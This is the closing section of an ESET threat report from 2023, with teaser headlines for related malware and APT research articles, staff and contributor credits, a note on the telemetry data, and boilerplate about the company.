Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company
While analyzing a Lazarus attack luring employees of an aerospace company, ESET researchers discovered a publicly undocumented backdoor

Operation Jacana: Foundling hobbits in Guyana
ESET researchers discovered a cyberespionage campaign against a governmental entity in Guyana

Operation King TUT: The universe of threats in LATAM
ESET researchers reveal a growing sophistication in threats affecting the LATAM region by employing evasion techniques and high-value targeting

Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers
ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible

Who killed Mozi? Finally putting the IoT zombie botnet in its grave
How ESET Research found a kill switch that had been used to take down one of the most prolific botnets out there

Unlucky Kamran: Android malware spying on Urdu-speaking residents of Gilgit-Baltistan
ESET researchers discovered Kamran, previously unknown malware, which spies on Urdu-speaking readers of Hunza News

Telekopye: Chamber of Neanderthals’ secrets
Insight into groups operating Telekopye bots that scam people in online marketplaces

ESET APT Activity Report Q2–Q3 2023
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 and Q3 2023

Credits

Team
Peter Stančík, Team Lead
Hana Matušková, Managing Editor
Aryeh Goretsky
Bruce P. Burrell
Klára Kobáková
Nick FitzGerald
Ondrej Kubovič
Rene Holt
Zuzana Pardubská

Contributors in this report
Anton Mäčko
Dušan Lacika
Igor Kabina
Ivan Bešina
Jakub Souček
Ján Adámek
Ján Šugarek
Jiří Kropáč
Ladislav Janko
Lukáš Štefanko
Martin Červeň
Michal Kopera
Michal Malík
Michal Škuta
Milan Fránik
Miloš Čermák
Patrik Sučanský
Vladimír Šimčák
Witold Gerstendorf

About the data

The threat statistics and trends presented in this report are based on global telemetry data from ESET. Unless explicitly stated otherwise, the data includes detections regardless of the targeted platform.

Further, the data excludes detections of potentially unwanted applications, potentially unsafe applications and adware, except where noted in the more detailed, platform-specific sections and in the Cryptocurrency threats section.

This data was processed with the honest intention to mitigate all known biases, in an effort to maximize the value of the information provided.

Most of the charts in this report show detection trends rather than provide absolute numbers. This is because the data can be prone to various misinterpretations, especially when directly compared to other telemetry data. However, absolute values or orders of magnitude are provided where deemed beneficial.

About ESET

For more than 30 years, ESET has been developing industry-leading IT security software and services to deliver comprehensive, multilayered protection against cybersecurity threats for businesses and consumers worldwide. ESET has long pioneered machine learning and cloud technologies that prevent, detect and respond to malware. ESET is a privately owned company that promotes scientific research and development worldwide.

WeLiveSecurity.com
@ESETresearch
ESET GitHub
ESET Threat Reports and APT Activity Reports

© 2023 ESET, spol. s r.o. - All rights reserved.

Trademarks used herein are trademarks or registered trademarks of ESET, spol. s r.o.
All other names and brands are registered trademarks of their respective companies.
